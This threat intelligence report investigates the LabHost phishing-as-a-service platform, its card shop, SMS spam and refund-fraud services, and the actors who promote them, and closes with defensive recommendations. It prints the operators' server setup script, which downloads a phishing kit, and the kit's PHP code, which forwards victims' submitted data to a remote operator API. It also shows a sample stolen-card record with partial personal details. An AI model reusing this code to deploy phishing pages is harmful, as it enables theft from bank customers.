In early 2024, Group-IB’s Threat Intelligence team observed a surge in phishing URLs targeting INTERAC, a Canadian payment service. Subsequently, a client operating in Canada reported an uptick in phishing attempts against their customers and shared a suspicious URL, lab-host[.]ru, prompting an investigation.

connection between the shared URL and INTERAC phishing pages, all originating from the LabHost Phishing-as-a-Service (PhaaS) platform

This inquiry unveiled a connection between the shared URL and INTERAC phishing pages, all originating from the LabHost Phishing-as-a-Service (PhaaS) platform.

In our latest blog post, we delve into the operations of LabHost and its subsidiary, LabCVV, exposing a sophisticated criminal network offering stolen credit card data for sale. While numerous PhaaS platforms exist, LabHost stands out due to its unique business model, which includes not only phishing services but also avenues for monetizing stolen credit cards and banking credentials through services like LabRefund.

We detail actionable insights and hunting techniques for Threat Intelligence and Anti-Fraud specialists to detect and mitigate such threats effectively. By shedding light on the fraudulent infrastructure behind LabHost and offering practical recommendations, this blog post aims to empower organizations in safeguarding their assets and clients against cyber threats.

Executive summary

The fraudulent ecosystem consists of three main entities:

LabHost – PhaaS platform
LabCVV – credit card shop
LabSend – SMS/MMS spam delivery system
LabRefund – TG channel and private groups where criminals teach their customers how to utilise stolen data

The first message related to LabHost was caught by Group-IB back in August 2021. We assume it is the date of foundation.

LabHost provides a platform to its users for orchestrating phishing attacks by automating processes of deployment and configuring phishing websites as well as modules for manual guiding of victims through some predefined attack scenarios. On top of that the service allows criminals to manage stolen logs and credit card information in a very convenient and comfortable way. Overall this approach significantly decreases requirements to tech skill of possible users and leads to an increasing amount of phishing attacks as a result.

Criminals start their path by renting a VPS server and auto-deploying a phishing website by providing access on the portal. Then in a few minutes the server is ready to be used.

The fraudster then generates links to a phishing page and sends it to victims using the LabSend service. LabSend is a spam service which provides its users an Android application and management panel for sending SMS/MMS messages using connected Android devices.

Victims receive a phishing link, open it and according to predefined scenarios guided through phishing pages which ask them to fill sensitive data like: credit card number, CVV, first and last name, date of birth, etc. The LabRat module here can be used by criminals to manually guide victims through attack scenarios in order to steal 2FA codes or any other information required to conduct a fraud.

After collecting logs with sensitive data and credit cards, criminals can use them to cash out money using drop accounts or sell them using the LabCVV shop. And there is another option with the service called LabRefund and supported by LabHost owners.

LabRefund is managed by LabHost owners and provides criminals with information on internet shops, where stolen credit cards can be used to order items and goods or even to make a refund on criminals’ accounts.

In other words, the LabHost ecosystem provides not only a tool to facilitate phishing attacks, but the whole infrastructure to monetize stolen data.

Investigation of DarkWeb forums and TG chats revealed at least 3 monikers highly likely connected to the criminal group: @MrSmartICQ, @Zimna514, @houdini13.

Also source codes of LabSend APK were uploaded to VirusTotal from Armenia via web interface. Which means that highly likely one of the developers is located in this country. VirusTotal reveals a link to github account.

Phishing-as-a-service

Dashboard and features

After creating an account, LabHost requires the user to purchase a subscription plan targeting North America or all other regions. The “North America” membership subscription is available in monthly, quarterly, and yearly payment plans at US$250 per month, whereas the “World” subscription is only available in monthly payments of US$300.

The “membership plans” that target LabHost offers as part of its turn-key services.

The subscription offers access to a fully automated deployment process for phishing pages, along with IP and device filtering based on geo-location and user agent, respectively; additionally, subscribers gain access to LabRat, a feature akin to O-panel and OV6 modules in uAdmin kit, facilitating real-time scenario control for stealing 2FA and other sensitive information, with an accompanying dashboard upon login displaying statistics on collected logs, stolen credit cards, geographical distribution of victims, and a list of recent victim sessions associated with phishing pages.

The service provides support via a ticket system, so any user can initiate a conversation with LabHost:

Creating a phishing site

The process of creating phishing websites is super simple and fully automated. It doesn’t require any technical knowledge from a criminal: just pay for a subscription and click a few buttons.

Once a criminal rent a VPS (running a CentOs or Ubuntu), he needs to allow root access and fill in root password during deployment process on LabHost:

The user can then choose from a list of 28 financial institutions, 12 online retail and service providers, and other real-world companies in the North America region to create a phishing site.

INTERAC's dedicated section for different options

The attacker can also filter visitors by their location (using geo IP) and/or their device (using browser’s user-agent). The system also allows criminals to determine where their victim will be redirected after theft: the real website of the lured organization, Bing, Yahoo, Google, Apple, etc. All options are listed above on the screenshot.

This final phase is actually very important. In case of redirection to a real website, organisations can detect phishing websites pretty fast by analysing referrers of the visitors to their website. It is one of a part of Fraud Protection product provided by Group-IB which is the most efficient way to mitigate the threat.

When everything required is specified and provided the backend logins via root to the VPS and executes the following batch script (DHL page is used as an example):

echo LabHost test
cat /etc/*release
apt install sudo -y
sudo sed -i "s/#precedence ::ffff:0:0\/96 100/precedence ::ffff:0:0\/96 100/" /etc/gai.conf
export DEBIAN_FRONTEND=noninteractive
apt-get update -y
apt-get install -y --force-yes software-properties-common
apt-add-repository ppa:ondrej/apache2 -y
apt-add-repository ppa:ondrej/php -y
apt-get update -y
add-apt-repository universe -y
apt-get install -o Dpkg::Options::="--force-confdef" -o Dpkg::Options::="--force-confold" -y --force-yes build-essential curl pkg-config zip unzip apache2
apt-get install -o Dpkg::Options::="--force-confdef" -o Dpkg::Options::="--force-confold" -y --force-yes php libapache2-mod-php php-cli php-dev php-pgsql php-sqlite3 php-gd php-curl php-memcached php-imap php-mysql php-mbstring php-xml php-zip php-bcmath php-soap php-intl php-readline php-msgpack php-igbinary php-gmp
sudo sed -i '//,/<\/Directory>/ s#AllowOverride None#AllowOverride All#' /etc/apache2/apache2.conf
a2enmod rewrite
systemctl restart apache2
apt-get update -y
apt install unzip -y
rm -rf /var/www/html/.htaccess
rm -rf /var/www/html/*
sudo wget -P /var/www/html --no-check-certificate "https://instapi-1xoa93z90o348fz.co/file-xm3728d/1709912030/global-dhl.zip"
sudo unzip /var/www/html/global-dhl.zip -d /var/www/html
sudo rm -f /var/www/html/global-dhl.zip
sudo chmod -R 755 /var/www/html
sudo sed -i 's/{{apikey}}//' /var/www/html/app/init.php
sudo sed -i 's#{{url}}#https://api2-4hdfix74ks.co#' /var/www/html/app/init.php
sudo systemctl restart apache2

So the script for other targets is very similar to the above. The only thing that changed is the URL where the phishing kit archive is located. However, all of them referred to instapi-1xoa93z90o348fz.co.

Another interesting finding in this script is the API address, where the subscription is checked: api2-4hdfix74ks.co.

LabRat aka real-time victim control module

Once a phishing server is set up a link is generated and can be sent to a victim. When the victim visits the phishing site and passes all filters based on the browser’s UA and IP geolocation a phishing page is shown.

Whenever a victim visits the phishing website, the server performs a request to check whether the hardcoded API key is valid and the subscription is active. If these checks are successful a criminal can observe an active session in the panel:

To work with active sessions, the criminals have to use the LABRAT module, which actually not a RAT at all, but just a dynamic module to control fraud scenarios and request a victim to provide additional information like 2FA code, PI data (date of birth, first and last names, driver license number, etc.), etc. It is very similar to O-panel module implemented in the notorious uAdmin phishing kit.

For example here it allows to choose from the following scenarios:

While an operator is choosing scenario, a victims observers loading stub:

Source codes analysis

Every targeted organization has its own template, however the general structure is the same. For this example we analyze an archive used as a template targeting it’s victim:

Folder structure

arrow_drop_down

The entry point for this web app os ./app/init.php:

<?php

session_start();

ob_start();

define('HOME_FOLDER', $_SERVER['DOCUMENT_ROOT']);

date_default_timezone_set('Europe/London');

$globalurl = '{{url}}';
$apikey = '{{apikey}}';
$route = $_SERVER['REQUEST_URI'];
$url = $globalurl . $route;

$_SERVER['HOST_IP'] = gethostbyname($_SERVER['SERVER_NAME']);

$post = [
'post' => isset($_POST) ? $_POST : [],
'session' => isset($_SESSION) ? $_SESSION : [],
'server' => isset($_SERVER) ? $_SERVER : [],
'apikey' => $apikey
];

$splitter = explode('.', $route);
$extension = $splitter[count($splitter) - 1];
$headers = [
'css' => 'text/css',
'js' => 'text/javascript',
'gif' => 'image/gif',
'html' => 'text/html',
'htm' => 'text/html',
'ico' => 'image/vnd.microsoft.icon',
'jpeg' => 'image/jpeg',
'jpg' => 'image/jpeg',
'png' => 'image/png',
'json' => 'application/json',
'php' => 'application/x-httpd-php',
'woff' => 'font/woff',
'woff2' => 'font/woff2',
'xml' => 'application/xml',
'svg' => 'image/svg+xml'
];
$header = isset($headers[$extension]) ? $headers[$extension] : '';

if (empty($header)) {
$download = rtrim(downloadString($url, $post), 0);
$response = json_decode($download, true);

if (isset($response['session']) && is_array($response['session'])) {
foreach ($response['session'] as $sname => $sval) {
$_SESSION[$sname] = $sval;
}
}

//die($download);

switch ($response['type']) {
case 0:
$udata = json_decode(json_encode($response['data']));
break;
case 1:
$redirect = !empty($response['redirect']) ? 'location: ' . $response['redirect'] : 'refresh:0';
header($redirect);
die();
break;
case 2:
http_response_code(404);
require_once HOME_FOLDER . '/pages/misc/unavailable.php';
die();
break;
case 3:
http_response_code(403);
die();
break;
case 4:
http_response_code(404);
die();
break;
case 5:
http_response_code(404);
require_once HOME_FOLDER . '/pages/misc/suspended.php';
die();
break;
}

if (empty($download)) {
http_response_code(404);
//require_once HOME_FOLDER . '/pages/misc/unavailable.php';
die();
}
} else {
header('Content-type: ' . $header);
echo downloadString($url);
}

function downloadString($url, $data = null)
{
$ch = curl_init($url);

if ($data) {
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
}

curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1');
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);

$result = curl_exec($ch);
$response = $result !== false ? $result : '';

curl_close($ch);
return $response;
}

function pdump($var)
{
echo '<pre>';
var_dump($var);
echo '</pre>';
die;
}

function escape($string, $default = '') {
if (is_array($string)) $string = $default;
return htmlentities(html_entity_decode($string), ENT_QUOTES, 'UTF-8');
}

function ab_randomstr($length = 8)
{
$randomString = '';
$characters = implode("", array_merge(range('a', 'z'), range('A', 'Z')));

for ($i = 0; $i < $length; $i++)
$randomString .= $characters[mt_rand(0, strlen($characters) - 1)];

return $randomString;
}

function ab_enc($output)
{
$randomFunc = ab_randomstr(mt_rand(6, 12));
$randomOut = ab_randomstr(mt_rand(6, 12));
$randomNum = ab_randomstr(mt_rand(6, 12));
$randomVal = mt_rand(1337, 99999999);

$return = '<script>' . PHP_EOL;
$return .= 'var ' . $randomOut . ' = "";' . PHP_EOL;
$return .= 'var ' . $randomNum . ' = [';

foreach(str_split($output) as $x) {
$return .= (ord($x) + $randomVal) . ', ';
}

$return = rtrim($return, ', ');
$return .= '];' . PHP_EOL;

$return .= $randomNum . '.forEach(function ' . $randomFunc . '(value) { ' . $randomOut . ' += String.fromCharCode(parseInt(value) - ' . $randomVal . '); } );' . PHP_EOL;
$return .= 'document.write(' . $randomOut . ');';
$return .= '</script>';

return $return;
}

function output($encrypt = false)
{
global $response;
$device = $response['server']['devices'] ?? '';

$output = ob_get_contents();
ob_clean();

if (strpos($_SERVER["SCRIPT_FILENAME"], 'api') === false) {
if ($device == '1') {
$output .= "<script>setTimeout(function() { if (screen.width >= 600) { window.location = '/notfound'; } }, 100);</script>";
} else if ($device == '2') {
$output .= "<script>setTimeout(function() { if (screen.width < 600) { window.location = '/notfound'; } }, 100);</script>";
}
}

$die = $encrypt ? ab_enc($output) : $output;

die($die);
}

This code shows that every time a victim visits the phishing website, the server sends the API key to the mentioned above (see “Creating a phishing site” section) api2-4hdfix74ks.co, where the subscription status is checked.

DarkWeb/Telegram analysis

An investigation of darkweb forums and Telegram channels revealed messages about “Labhost” from August 2021.

The service was most actively promoted by three users in Canadian Telegram chats: @MrSmartICQ, @Zimna514 and @houdini13.

The first mentions of “Labhost” from August 24, 2021, were found in the Montreal Telegram chat @mtltrap (🇨🇦𝗠𝗧𝗟 𝗧𝗥𝗔𝗣𝗦𝗧𝗔𝗥𝗦🇨🇦). Currently, the chat has been deleted, but the messages have been archived by the Group-IB Threat Intelligence system.

Messages were sent from accounts https://t.me/MrSmartICQ (id 724887901) and https://t.me/houdini13 (id 882956983). Both accounts are still active, have not changed their usernames, and belong to the same individuals as in 2021.

On September 6, 2021, the first message was sent with a link to the Telegram channel https://t.me/labhost.

The channel was created on August 17, 2021, and the first messages appeared on August 29, 2021. The Telegram channel remains active and is still used by “Labhost”.

On September 7, 2021, @MrSmartICQ announced the first domain “LabHost” – https://labhost[.]cc. A similar message was also published on the Telegram channel @labhost.

The third account promoting “LabHost” was https://t.me/Zimna514 (id 2012343631). On October 3, 2021, on the Telegram channel @mtltrap, he posted a message with the new domain https://labhost[.]co. Unlike the other two accounts, @Zimna514 is already deleted.

Houdini13 also owns the service “The Lab Refunds” with the Telegram channels https://t.me/TheLabRefunds and https://t.me/labrefundvouch. This service also operates only in Canada. We assume that this way it is possible to purchase stuff with a stolen card and refund the money to the threat actor’s or a drop card.

Using stolen accounts or credit card data obtained through phishing, fraudsters purchase stuff on legitimate online stores such as Amazon, Zara, Puma, Asos, Monos. The service “The Lab Refunds” assists them in refunds.

In August 2023, @houdini13 also advertised a service for spam mailings “Lab Send” (https://t.me/LabSend, https://labsend[.]co).

In addition to the clear focus of the “LabHost” service on Canada and advertising in the Montreal chat, there are also indications that individuals associated with “LabHost” are located in Canada.

This mainly concerns the user @houdini13. Since September 2021, he has been selling “Canada profiles”.

For this purpose, he created the Telegram bot @HoudiniProfiles_Bot, later changed to https://t.me/ProfileShop_Bot, which still works.

We found 115 messages advertising @HoudiniProfiles_Bot in Telegram chat @mtltrap and only one of them was not sent by @houdini13. It was a message with completely matching text, but it was sent by @Zimna514.

In August and September 2021, “LabHost” was advertised by the accounts @MrSmartICQ and @houdini13, but since October 2021, it has been advertised by @MrSmartICQ and @Zimna514. We assume that the accounts @houdini13 and @Zimna514 belonged to the same person.

The most interesting mention of Canada was in 2021. @houdini13 in the already deleted telegram chat @NoirsRefunds was looking for Rolex, and in September he was already trying to refund it from Canada.

As for the account @Zimna514, although it has now been deleted, it is a very unique username. A search for “Zimna514” revealed that only one person uses this nickname, coincidentally a Canadian citizen. However, at the moment, we do not have enough data to assert his involvement with “LabHost”.

There is less public information about the account @MrSmartICQ, but it is also associated with Canada.

Even a year before the creation of “LabHost“, in September 2020, @MrSmartICQ was looking for a database of profiles from Canada.

@MrSmartICQ looking for a database of profiles from Canada through telegram

Interestingly, in 2022, he was looking for a designer to improve his website and apparently found one.

LabSend spam management service

LabSend spam service was initially released in 2022. According to their TG channel it is a device manager platform which facilitates spam campaign via SMS/MMS messages.

Key Features

Unlimited Devices
SMS and MMS Sending
Syntax Messaging (message randomizer)
Auto Responder
Custom Delays
Message Templates
Multiple Languages
Responsive Support
Constant Updates

Moreover the ad says that combining LabHost together with LabSend maximizes results.

All marketing materials (like videos, GUI) are created in a very professional way. The subscription is pretty cheap for a such kind of services:

Users of LabSend service should download and install an APK on their Android devices, and then via the web platform they can perform spam campaigns sending phishing links to victims.

Group-IB found this APK uploaded to VirusTotal on 2023-11-20 with SHA1 hash cda695baad4be4f6067195395997360337a43d6f . Based on our RE analysis it uses labsend[.]co and files.labsend[.]co as C2 addresses.

LabCVV Card Shop

Official TG group of LabHost on 3rd of January 2024 started to advertise LabCVV credit card shop.

LabCVV credit card shop in telegram screenshot

The credit card shop has a very similar UI to LabHost service. This similarity and the fact that CC shop is promoted by LabHost lead to the assumption that both services belong to the same criminal group behind OR at least were developed by the same web designer.

Example of purchased data:

|============ Details ===========|
| Full Name: 
| Address: 
| City: Laval
| Postal Code: H7T 0E2
| Phone: 
| DOB: 10/09/1953
|
| Date:  09:15:01pm
| Browser: Mobile Safari
| OS: iOS
| Location: Montreal, Canada
| IP Geo: http://www.geoiptool.com/?IP=142.169.16.238
| User Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 15_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.5 Mobile/15E148 Safari/604.1
|
|============ Card Info ===========|
| Card: 
| Expiry: 03/23
| Cvv: 
|
| Bank: 
| Scheme: VISA
| Type: DEBIT
| Brand: TRADITIONAL
| Bin: 
| Country: CA
| Prepaid: NON-PREPAID
|
| Time:  09:15:59pm
|
|============ Card Info ===========|
| Card: 
| Expiry: 03/23
| Cvv: 413
|
| Bank: 
| Scheme: VISA
| Type: DEBIT
| Brand: TRADITIONAL
| Bin: 
| Country: CA
| Prepaid: NON-PREPAID
|

Recommendations

For common users

Always be cautious and fully aware of anything sent to you, even if you think it may be legitimate.
Do not click on any links that you are not 100% confident are real
Double check the address of a website is the official one before you submit any information
If the link comes from someone you know, confirm with that person using another way of communication
Contact the organization thatwhich sent you a link to confirm they have really sent you that message
If in doubt, use services like URLScan or VirusTotal to quickly scan the URL you have been sent, and look for red flags
If you think you may be a victim of a phishing attack, contact your bank and local enforcement agencies immediately with information about the organization being impersonated by the fraudsters and the police. They can issue an alert which may ultimately raise awareness and reduce the victim count.
Keep in mind that usually official organizations do not use URL shorteners, so links leading to bit.ly, s.id, tny.sh and others, are very suspicious and you should double check the final destination
Report any identified phishing email or SMS to fraudehelpdesk.nl, scamadviser.com, organizations that were lured. These reports aid cybersecurity professionals to investigate and take action against fraudulent websites, in addition to helping protect other victims.

For targeted businesses

Fighting this type of threat relies on different ways. Let’s enumerate them in order of efficiency:

Continuous monitoring and detection of phishing websites and their take-down process
Analysing the infrastructure and taking it down
A state-of-the-art anti-fraud solution that can detect and block unauthorized logins and transactions
An investigation focused on finding identities of criminals behind the Phaas.

While the first two approaches can temporarily mitigate the threat, they require continuous investments and don’t guarantee 100% coverage.

At Group-IB we advise our corporate customers to investigate specific phenomena and identify criminals behind a scheme. For financial organizations we recommend installing Group-IB’s Fraud Protection Service.

Our Fraud Protection team recommends:

Continuous surveillance of new threats and beginning the phishing site takedown process using Threat Intelligence and Digital risk or Brand protection providers. These services help an organization track illegitimate brand usage to inform defensive priorities to mitigate risk.
Implement active call detection using session monitoring systems, Abnormal call duration, Remote Access Detection, parallel access to a user account from different devices, and Access from well-known fraudulent devices.

According to the Group-IB Fraud Matrix, the following detection and mitigation steps for this scheme are required:

Resource Development

Internal mule accounts

Detections:

Data Source	Data Component	Description
Sessional Monitoring	Device fingerprinting	Detection of links between unrelated accounts via devices, locations and transactions

Trust abuse

Mitigations:

Data Source	Data Component	Description
Threat intelligence providers	Dark web, instant messages, monitoring	Threat intelligence services help an organization generate its threat intelligence information and track trends to inform defensive priorities to mitigate risk.
Digital risk or brand protection providers	Brand abuse	Digital or brand protection services help an organization track illegitimate brand usage to inform defensive priorities to mitigate risk.

Account access

Detections:

Data Source	Data Component	Description
Sessional Monitoring	Non-monetary transaction	Parallel access to a user account from different devices
Sessional Monitoring	Device fingerprinting	access from well-known fraudulent devices.

Perform fraud